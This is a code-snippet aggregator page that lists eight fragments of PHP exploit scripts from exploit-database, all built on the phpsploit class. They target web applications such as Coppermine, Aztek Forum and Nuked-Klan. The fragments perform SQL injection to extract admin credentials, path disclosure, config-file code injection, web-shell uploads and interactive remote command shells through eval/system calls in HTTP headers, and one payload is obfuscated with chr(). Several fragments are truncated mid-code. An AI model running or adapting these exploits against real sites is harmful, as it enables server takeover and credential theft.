Exemplos de phpsploit::post em PHP

Exemplo n.º 1

Arquivo: 5449.php Projeto: noscripter/exploit-database

    } else {
        return;
    }
}
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");
$source = @file_get_contents($file);
if (strlen($source) < 2) {
    exit("{$file} don't exist.\n");
}
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
    $xpl->addcookie("PHPSESSID", $phpsessid[1]);
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
}

Exemplo n.º 2

Arquivo: 3085.php Projeto: SuperQcheng/exploit-database

 Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    print "\nsploit> Not found";
}
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
/*/
 If you have the admin cookie (but not the password),
 replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter");
if (!preg_match("#color:red#", $xpl->getcontent())) {
    print "\nsploit> Done";
} else {
    die("\nstatus> Exploit failed\n");
}
/*/
 (usermgr.php)
 =============
 case 'group_alb_access' :
 if (isset($_GET['gid']))  $group_id = $_GET['gid'];
 $sql = "SELECT group_name  FROM [...] WHERE group_id = $group_id [...]";
 $result = cpg_db_query($sql);

 (db_ecard.php)
 ==============

Exemplo n.º 3

Arquivo: 3196.php Projeto: SuperQcheng/exploit-database

if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
print "\nstatus> Trying to get database informations";
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
    print "\nsploit> Full Path Disclosure -> " . $matches[1];
} else {
    print "\nsploit> Failed";
}
$wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]);
if (!empty($wanted)) {
    $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg");
    $xpl->get($url . "index.php?owner={$owner}&choix=3");
    if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) {
        print "\nsploit> Done (" . $matches[1] . ")";
    } else {

Exemplo n.º 4

Arquivo: 4608.php Projeto: SuperQcheng/exploit-database

$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
do {
    $xpl->addheader('Shell', "@system({$cmd});");
    $xpl->get($url . 'dirsys/config.inc.php');
    print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
exit(0);

Exemplo n.º 5

Arquivo: 5404.php Projeto: SuperQcheng/exploit-database

$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name. */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
$success = true;
if ($mode == 0) {
    print " * loading uploader\t";
    $xpl->addheader("upload", "1");
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
        print "done\n";
    } else {
        $success = false;
        print "error\n";
    }
} else {
    print "\n\$shell> ";
    while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
        $xpl->reset('header');

Exemplo n.º 6

Arquivo: 5339.php Projeto: SuperQcheng/exploit-database

$adm = getparam("admin");
$acc = getparam("user");
$prx = getparam("proxy");
$prefix = getparam("prefix") ? getparam("prefix") : "nuked_";
$file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>';
$date = array(date('Y'), date('m'), date('d'));
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
/* Admin account defined */
if ($adm) {
    print "[*] Using admin account {$adm}\n";
    list($login, $passwd) = explode(":", $adm);
    $xpl->addheader("Referer", $url);
    $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
    if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
        $admin_sid = $sid[1];
        $admin_uid = $uid[1];
        print "      SID -> {$admin_sid}\n";
        print "      UID -> {$admin_uid}\n";
        finalattack($admin_sid, $admin_uid);
    } else {
        exit("[*] Can't log in\n");
    }
} else {
    /* User account defined */
    if ($acc) {
        print "[*] Using user account {$acc}\n";
        list($login, $passwd) = explode(":", $acc);
        $xpl->addheader("Referer", $url);

Exemplo n.º 7

Arquivo: 3103.php Projeto: SuperQcheng/exploit-database

 |  ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
 |  // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
 |
/*/
$sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) {
    print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2];
} else {
    die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to get logged in";
$xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification");
if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";
$data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer";

Exemplo n.º 8

Arquivo: 3858.php Projeto: SuperQcheng/exploit-database

$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
} else {
    print "\n\$shell> ";
}
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;";
$sql[] = "DELETE FROM {$config['0']}_nbconnecte;";
for ($i = 0; $i < count($sql); $i++) {
    $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]);
}
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    # 0'); include('./conf.inc.php'); print $global['db_pass']; //
    $xpl->reset('header');
    $xpl->addheader('Shell', "system('{$cmd}');");
    $xpl->get($url);
    $data = explode('123456789', $xpl->getcontent());
    print $data[1] . "\n\$shell> ";
}
function char($data)
{
    $char = 'CHAR(';
    for ($i = 0; $i < strlen($data); $i++) {
        $char .= ord($data[$i]);
        if ($i != strlen($data) - 1) {